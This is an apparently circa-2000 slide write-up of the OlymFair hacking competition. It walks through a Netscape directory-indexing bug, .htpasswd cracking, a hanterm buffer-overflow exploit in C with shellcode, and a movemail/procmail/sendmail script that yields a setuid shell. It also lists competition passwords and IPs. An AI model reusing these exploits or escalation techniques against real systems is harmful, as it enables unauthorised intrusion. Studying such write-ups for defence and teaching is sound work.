Embed Size (px)
Citation preview
1st OlymFair WorkshopHacking technique
Taeho Oh
http://postech.edu/~ohhara
Contents
• How to pass level 1
• How to pass level 2
• Why did many hackers consume much time in the level 2?
• About level 3
• Conclusion
How to pass level 1 (1)
• What to do?– Execute /cgi-bin/data/idaccess.cgi and get the
way to go to level 2
How to pass level 1 (2)
• Level 1 servers– 203.227.243.161– 203.227.243.162– 203.227.243.163
How to pass level 1 (3)
• 203.227.243.161– OS : Solaris 8– Opened TCP port : 80, 8080
How to pass level 1 (4)
• 203.227.243.162– OS : HPUX 11.0– Opened TCP port : 22, 80, 8080
How to pass level 1 (5)
• 203.227.243.163– OS : MS Windows 2000– Opened TCP port : 7, 9, 13, 17, 19, 25, 80, 135,
139, 443, 1025, 1026, 1032, 1723, 3389
How to pass level 1 (6)
• Attack 203.227.243.161– 80 : Apache Web Server– 8080 : Netscape Enterprise Server
• 80 and 8080 web server has same httpd home directory
• Netscape Enterprise Server has a security bug
How to pass level 1 (7)
• Netscape Enterprise Server security bug– I could see files in the specific directory like
below• http://203.227.243.161/?wp-cs-dump
– You can also use ?wp-ver-info, ?wp-html-rend, ?wp-usr-prop, ?wp-ver-diff, ?wp-verify-link, ?wp-start-ver, ?wp-stop-ver, and ?wp-uncheckout
– I could browse the directories and check the file existence
How to pass level 1 (8)
• The file list/
+----- cgi-bin/
| +----- data/
| +----- hackme/
| +----- a
| +----- a.c
| +----- show_file.html
| +----- showfile.cgi
+----- data/
+----- index.html
Can’t access this directory
How to pass level 1 (9)
• Read .htaccess file with showfile.cgi– http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-
bin/data/.htaccess
• Read .htpasswd file from .htaccess with showfile.cgi– http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-
bin/data/.htpasswd
How to pass level 1 (10)
• I could crack the encrypted password from .htpasswd with Crack– id:password = admin:banana– I could access /cgi-bin/data directory with this
id and password
How to pass level 1 (11)
• I could get the way to go to level 2– http://203.227.243.161/data/idaccess.html
• This page is the form that executes http://203.227.243.161/cgi-bin/data/idaccess.cgi
– My serial number• KOR000321-961829513
– My password• oD8YEuqYySWogKSQQsOY00zoAjUkxtv7
How to pass level 1 (12)
• Netscape Enterprise Server directory indexing vulnerability– See
http://www.securityfocus.com/vdb/bottom.html?vid=1063
How to pass level 1 (13)
• Netscape Enterprise Server directory indexing vulnerability patch information
The Directory Indexing feature can be turned off via the Administration Interface. Selecting Content Management -> Document Preferences and changing Directory Indexing to "none" will disable this feature.Also, manually editing the file obj.conf will do the same. Conduct a search for the following:Service method="(GET|HEAD)" type="magnus-internal/directory"fn="index-common"and replace fn="index-common" with fn="send-error".
How to pass level 2 (1)
• What to do?– Execute /home/forbidden/pass.cgi
• This executable file owner is root
• This executable file group is wizard
• The permission is 0510
• Need wizard gid to execute /home/forbidden/pass.cgi
How to pass level 2 (2)
• Level 2 server– 203.227.243.164
• 203.227.243.164– OS : Linux– Opened TCP port : 23, 81
How to pass level 2 (3)
• Wizard setuid or setgid files-r-sr-xr-x 1 wizard wizard 26309 Jan 4 09:40 /sbin/pwdb_chkpwd
-rwsr-sr-x 1 wizard wizard 47692 Mar 29 1999 /sbin/dump
-rwsr-xr-x 1 wizard wizard 10708 Apr 20 1999 /sbin/cardctl
-rws--x--x 1 wizard wizard 6148 May 15 1999 /usr/X11R6/bin/Xwrapper
-rws--x--x 1 wizard wizard 158180 May 14 1999 /usr/X11R6/bin/hanterm
-rwsr-xr-x 1 wizard wizard 33120 Mar 22 1999 /usr/bin/at
-rwsr-xr-x 1 wizard wizard 3208 Mar 23 1999 /usr/bin/disable-paste
-r-sr-x--- 1 wizard wizard 42652 Aug 31 1999 /usr/bin/inndstart
-r-sr-x--- 1 wizard wizard 40060 Aug 31 1999 /usr/bin/startinnfeed
-r-sr-sr-x 1 wizard wizard 15816 Jan 7 07:41 /usr/bin/lpq
-r-sr-sr-x 1 wizard wizard 15608 Jan 7 07:41 /usr/bin/lpr
-r-sr-sr-x 1 wizard wizard 16248 Jan 7 07:41 /usr/bin/lprm
How to pass level 2 (4)
• Wizard setuid or setgid files ( Cont. )-rws--x--x 2 wizard wizard 517916 Apr 7 1999 /usr/bin/suidperl
-rws--x--x 2 wizard wizard 517916 Apr 7 1999 /usr/bin/sperl5.00503
-rwsr-sr-x 1 wizard wizard 64468 Apr 7 1999 /usr/bin/procmail
-rwsr-xr-x 1 wizard wizard 14036 Apr 16 1999 /usr/bin/rcp
-rwsr-xr-x 1 wizard wizard 10516 Apr 16 1999 /usr/bin/rlogin
-rwsr-xr-x 1 wizard wizard 7780 Apr 16 1999 /usr/bin/rsh
-rwxr-sr-x 1 wizard wizard 17832 May 14 1999 /usr/lib/emacs/20.3/i386-redhat-linux/movemail
-rwsr-sr-x 1 wizard wizard 299364 Apr 20 1999 /usr/sbin/sendmail
-rwsr-xr-x 1 wizard wizard 16488 Mar 23 1999 /usr/sbin/traceroute
-rwsr-xr-x 1 wizard wizard 18040 Jan 8 05:24 /usr/sbin/userhelper
-rwxr-sr-x 1 wizard wizard 3860 Apr 20 1999 /sbin/netreport
How to pass level 2 (5)
• Attack process
Get wizard euid
Get wizard uid
Create wizard uid, gid file
Get wizard gid
Execute pass.cgi
Get level2 shell
How to pass level 2 (6)
• level2 shell wizard euid– Exploit hanterm bug
[I have no name!@level2 ... ]$ hanterm -hfn `perl -e "print 'A'x240"`
can't load english font AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAA
[I have no name!@level2 ... ]$ hanterm -hfn `perl -e "print 'A'x250"`
Segmentation fault
[I have no name!@level2 ... ]$
How to pass level 2 (7)
• level2 shell wizard euid (Cont.)– This is a classical buffer overflow bug– I could get wizard euid shell with 260 buffer
size and -450 offset
How to pass level 2 (8)
• Exploit code
#include<stdio.h>
#include<stdlib.h>
#define OFFSET -450
#define RET_POSITION 260
#define RANGE 20
#define NOP 0x90
char shellcode[1024]=
"\xeb\x1f“ /* jmp 0x1f */
"\x5e“ /* popl %esi */
"\x89\x76\x08“ /* movl %esi,0x8(%esi) */
How to pass level 2 (9)
• Exploit code (Cont.)
"\x31\xc0“ /* xorl %eax,%eax */
"\x88\x46\x07“ /* movb %eax,0x7(%esi) */
"\x89\x46\x0c“ /* movl %eax,0xc(%esi) */
"\xb0\x0b“ /* movb $0xb,%al */
"\x89\xf3“ /* movl %esi,%ebx */
"\x8d\x4e\x08“ /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c“ /* leal 0xc(%esi),%edx */
"\xcd\x80“ /* int $0x80 */
"\x31\xdb“ /* xorl %ebx,%ebx */
"\x89\xd8“ /* movl %ebx,%eax */
How to pass level 2 (10)
• Exploit code (Cont.)
"\x40“ /* inc %eax */
"\xcd\x80“ /* int $0x80 */
"\xe8\xdc\xff\xff\xff“ /* call -0x24 */
"/bin/sh"; /* .string \"/bin/sh\" */
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}
void main(int argc,char **argv)
{
How to pass level 2 (11)
• Exploit code (Cont.)
char buff[RET_POSITION+RANGE+1],*ptr;
long *addr_ptr,addr;
unsigned long sp;
int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
int i;
if(argc>1)
offset=atoi(argv[1]);
sp=get_sp();
addr=sp-offset;
ptr=buff;
How to pass level 2 (12)
• Exploit code (Cont.)
addr_ptr=(long*)ptr;
for(i=0;i<bsize;i+=4)
*(addr_ptr++)=addr;
for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
buff[i]=NOP;
ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
for(i=0;i<strlen(shellcode);i++)
*(ptr++)=shellcode[i];
buff[bsize-1]='\0';
How to pass level 2 (13)
• Exploit code (Cont.)
execl("/usr/X11R6/bin/hanterm","hanterm",“-hfn",buff,0);
}
How to pass level 2 (14)
• wizard euid wizard uid[I have no name!@level2 ... ]$ cat > a.c
main(){
setreuid(501,501);
execl("/bin/sh","sh",0);
}
[I have no name!@level2 ... ]$ gcc a.c ; ./a.out
[wizard@level2 ... ]$ whoami
wizard
[wizard@level2 ... ]$
How to pass level 2 (15)
• wizard uid create wizard uid, gid file– movemail program is wizard setgid program
• movemail program output file is wizard gid
[wizard@level2 ... ]$ echo haha > test1
[wizard@level2 ... ]$ movemail test1 test2
[wizard@level2 ... ]$ ls –l test1 test2
-rw-r--r-- 1 wizard hackers 0 Jul 10 02:03 test1
-rw-r--r-- 1 wizard wizard 5 Jul 10 02:03 test2
[wizard@level2 ... ]$ cat test2
haha
How to pass level 2 (16)
• wizard uid, gid file wizard gid– procmail can execute a arbitrary shell command
with wizard uid, gid when the user can create wizard uid, gid file
How to pass level 2 (17)
• Exploit code#!/bin/sh
PATH=${PATH}:/usr/lib/emacs/20.3/i386-redhat-linux
export PATH
cat > shh.c << EOF
main(){
setreuid(501,501);
setregid(501,501);
execl("/bin/sh","sh",0);
}
EOF
How to pass level 2 (18)
• Exploit code (Cont.)
gcc shh.c -o shh
movemail shh shh2
cat > proc << EOF
:0
*
| /bin/chmod 6777 /tmp/shh2
EOF
How to pass level 2 (19)
• Exploit code (Cont.)
movemail proc /home/wizard/.procmailrc
echo haha | /usr/sbin/sendmail -OQueueDirectory=/tmp wizard
sleep 2
rm -f /home/wizard/.procmailrc
rm -f ./proc
rm -f ./exp
rm -f ./shh.c
rm -f ./shh
echo "rm -f ./shh2" | ./shh2
How to pass level 2 (20)
• wizard gid execute pass.cgiCongratulation!!
You have passed Level 2.
Your ID : KOR000321-961829513
Initial Pass Time Stamp : 2000-06-30 13:59:30GMT+9
IP for Level 3 is 203.227.243.173
It is protected by ip filtering.
Please attack and acquire adminstrator's privilege.And then change the index.htm
l under level3 server.
Level 3 Login ID : level3
Level 4 Login Passwd : olymfair3
Why did many hackers consume much time in the level 2? (1)
• Almost all hackers tried to find a security bug– However, level2 can be cleared with not a bug
but a feature. ( except for hanterm bug )
Why did many hackers consume much time in the level 2? (2)
• /sbin/dump program has a buffer overflow bug and exploit is not released– Many hackers try to exploit this program.
However, the exploit is impossible because main function does not return but exit
Why did many hackers consume much time in the level 2? (3)
• /usr/bin/lprm exploit code generates segmentation fault message– The segmentation fault message is not
generated by /usr/bin/lprm. The message is generated by /usr/bin/lprm exploit code. It’s an exploit code bug.
About level 3
• I consumed much time so I have no time to attack level 3
• I tried to scan level 3 server– However, I can’t find opened TCP port– I didn’t try to attack level 3 from then on
• It seemed to take much time
Conclusion
• It was an interesting hacking competition
